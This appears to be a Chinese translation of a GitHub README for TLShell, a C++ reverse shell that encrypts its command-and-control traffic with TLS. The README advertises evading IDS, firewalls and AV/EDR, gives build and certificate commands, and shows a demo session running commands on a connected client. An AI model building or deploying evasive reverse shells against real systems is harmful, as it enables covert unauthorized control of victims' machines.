umutcamliyurt/TLShell

GitHub: umutcamliyurt/TLShell

TLShell 是一个基于 TLS 加密的隐蔽反向 Shell 工具,通过加密 C2 通信来规避传统网络安全设备的明文流量检测。

Stars: 1 | Forks: 1

# TLShell ## 一个加密的隐蔽反向 shell ## 描述: 传统的反向 shell 以明文形式发送数据,这使得它们很容易被网络监控工具、入侵检测系统(IDS)或防火墙检测或拦截。然而,通过 TLS 加密,攻击者与目标机器之间的通信是加密的,从而确保了机密性,并降低了被检查未加密流量的安全工具检测到的风险。 ## 功能: - 大多数 AV/EDR 解决方案无法检测 - 支持多会话 - 使用 C++ 编写 - 加密的 C&C **重要提示:请将客户端代码中硬编码的证书替换为您自己的证书** ## 安装: ``` sudo apt update sudo apt install openssl mingw-w64 libssl-dev git clone https://github.com/umutcamliyurt/TLShell.git cd TLShell/ openssl req -x509 -newkey rsa:2048 -keyout server.key -out server.crt -days 36500 -nodes g++ server.cpp -o server -lssl -lcrypto g++ client.cpp -o client -lssl -lcrypto ``` ## 演示: ``` umutcamliyurt@localhost:~/Projects/TLShell$ sudo ./server 443 Server listening on port 443... Commands: /list - list clients /switch - set active session /broadcast - send to all clients /kick - disconnect a client /help - show this help /exit - shutdown server Typing anything else sends it to the active session. > > [server] Client #1 connected from 127.0.0.1:38194 > id > [1 127.0.0.1:38194] uid=1000(umutcamliyurt) gid=1000(umutcamliyurt) groups=1000(umutcamliyurt),3(sys),981(rfkill),998(wheel) > ``` ## 结果: ![截图](https://static.pigsec.cn/wp-content/uploads/repos/cas/af/afc8c878b3121fced7087e0335b34ca7192f19a25a225a00926b8ae96541bfea.png) *图 1:Linux 上的结果。* ![截图](https://static.pigsec.cn/wp-content/uploads/repos/cas/b6/b6ca5522dcfcb69e256b7c71608bd11f7daf60ce09999bc71ee989e43a68a21b.png) *图 2:Windows 上的结果。* ## 许可证 基于 MIT 许可证分发。查看 `LICENSE` 获取更多信息。
标签:C++, Gophish, TLS加密, 反向Shell, 命令与控制(C2), 安全测试工具, 底层编程, 数据擦除, 网络信息收集